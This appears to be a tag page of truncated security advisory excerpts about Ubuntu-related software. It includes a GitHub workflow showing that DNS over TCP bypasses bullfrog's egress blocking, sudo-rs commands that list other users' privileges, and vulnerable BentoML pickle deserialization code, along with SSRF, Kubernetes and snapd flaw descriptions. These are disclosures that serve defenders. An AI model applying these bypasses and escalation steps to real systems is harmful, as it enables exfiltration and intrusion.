#ubuntu

### Summary Using tcp breaks blocking and allows DNS exfiltration. ### PoC ``` name: test on: push: branches: - "*" jobs: testBullFrog: runs-on: ubuntu-22.04 steps: - name: Use google dns run: | sudo resolvectl dns eth0 1.1.1.1 resolvectl status - name: Set up bullfrog to block everything uses: bullfrogsec/bullfrog@1472c28724ef13ea0adc54d0a42c2853d42786b1 # v0.8.2 with: egress-policy: block allowed-domains: | *.github.com - name: Test connectivity run: | echo testing udp allowed .. dig api.github.com @1.1.1.1 || : echo testing tcp allowed .. dig api.github.com @1.1.1.1 +tcp || : echo testing udp not allowed dig api.google.com @1.1.1.1 || : echo testing tcp not allowed dig api.google.com @1.1.1.1 +tcp || : ``` ### Impact sandbox bypass ![image](https://github.com/user-attach...

### Summary Users with limited sudo privileges (e.g. execution of a single command) can list sudo privileges of other users using the `-U` flag. This doesn't happen with the original sudo. ### PoC The initial test has been done in a container running Ubuntu 24.04 and installing [oxidizr](https://github.com/jnsgruk/oxidizr), running sudo-rs 0.2.2. A user (bob) has been added with only ps command executable through sudo: ``` root ALL=(ALL:ALL) ALL bob ALL=(ALL:ALL) /usr/bin/ps ``` The user is not able to read the `/etc/sudoers` file and running `sudo -l -Uroot` with original sudo (version 1.9.15p5) causes the following error: ``` Sorry, user bob is not allowed to execute 'list' as root on 43d4aed3cdbd. ``` The same command with sudo-rs is run without denying the execution: ``` User root may run the following commands on 43d4aed3cdbd: (ALL : ALL) ALL ``` The same happens for other non-root users: ``` bob@43d4aed3cdbd:~$ sudo -l -Ufoo User foo may run the following com...

### Summary: A user with permission to create/modify EventSource and Sensor custom resources can gain privileged access to the host system and cluster, even without having direct administrative privileges. ### Details: The `EventSource` and `Sensor` CRs allow the corresponding orchestrated pod to be customized with `spec.template` and `spec.template.container` (with type `k8s.io/api/core/v1.Container`), thus, any specification under `container` such as `command`, `args`, `securityContext `, `volumeMount` can be specified, and applied to the EventSource or Sensor pod due to the code logic below. ```golang if args.EventSource.Spec.Template != nil && args.EventSource.Spec.Template.Container != nil { if err := mergo.Merge(&eventSourceContainer, args.EventSource.Spec.Template.Container, mergo.WithOverride); err != nil { return nil, err } } ``` With these, A user would be able to gain privileged access to the cluster host, if he/she specified the Even...

### Summary A Remote Code Execution (RCE) vulnerability caused by insecure deserialization has been identified in the latest version(v1.4.2) of BentoML. It allows any unauthenticated user to execute arbitrary code on the server. ### Details It exists an unsafe code segment in `serde.py`: ```Python def deserialize_value(self, payload: Payload) -> t.Any: if "buffer-lengths" not in payload.metadata: return pickle.loads(b"".join(payload.data)) ``` Through data flow analysis, it is confirmed that the `payload `content is sourced from an HTTP request, which can be fully manipulated by the attack. Due to the lack of validation in the code, maliciously crafted serialized data can execute harmful actions during deserialization. ### PoC Environment: - Server host: - IP: 10.98.36.123 - OS: Ubuntu - Attack host: - IP: 10.98.36.121 - OS: Ubuntu 1. Follow the instructions on the BentoML official README(https://github.com/bentoml/BentoML) to set up the environment. 1.1 I...

Cisco Talos has discovered an active exploitation of CVE-2024-4577 by an attacker in order to gain access to the victim's machines and carry out post-exploitation activities.

William discusses what happens when security is an afterthought rather than baked into processes and highlights the latest of Talos' security research.

By Aleksandar Nikolich Earlier this year, we conducted code audits of the macOS printing subsystem, which is heavily based on the open-source CUPS package. During this investigation, IPP-USB protocol caught our attention. IPP over USB specification defines how printers that are available over USB can only still support network printing

### Summary This vulnerability allows a user to maneuver the Webfinger mechanism to perform a GET request to any internal resource on any Host, Port, URL combination regardless of present security mechanisms, and forcing the victim’s server into an infinite loop causing Denial of Service. Moreover, this issue can also be maneuvered into performing a Blind SSRF attack. ### Details The Webfinger endpoint takes a remote domain for checking accounts as a feature, however, as per the ActivityPub spec (https://www.w3.org/TR/activitypub/#security-considerations), on the security considerations section at B.3, access to Localhost services should be prevented while running in production. The **lookupWebFinger** function, responsible for returning an actor handler for received actor objects from a remote server, can be abused to perform a Denial of Service (DoS) and Blind SSRF attacks while attempting to resolve a malicious actor’s object. On Fedify, two client-facing functions implement the *...

January Linux Patch Wednesday. Out of 424 total vulnerabilities, 271 are in the Linux Kernel. None show signs of exploitation in the wild, but 9 have public exploits. 🔸 RCE – Apache Tomcat (CVE-2024-56337). Based on the description, the vulnerability affects “case-insensitive file systems” like Windows or MacOS. However, Debian lists it as affecting tomcat9 […]

### Impact A snap with prior permissions to create a mount entry on the host, such as firefox, normally uses the permission from one of the per-snap hook programs. A unprivileged users cannot normally trigger that behaviour by using `snap run --shell firefox` followed by `snapctl mount`, since snapd validates the requesting user identity (root or non-root). The issue allows unprivileged users to bypass that check by crafting a malicious command line vector which confuses snapd into thinking the help message is requested. Unprivileged user on a default installation of Ubuntu, where firefox is as provided as a snap, may cause a denial-of-service attack by repeatedly mounting hunspell database over and over and eventually exhausting system memory. Other attacks, reliant on the same underying mechanism (mount), are possible. In all cases the snap must be installed and grated permission to perform this action (by connecting an appropriate snap interface), which requires administrative pr...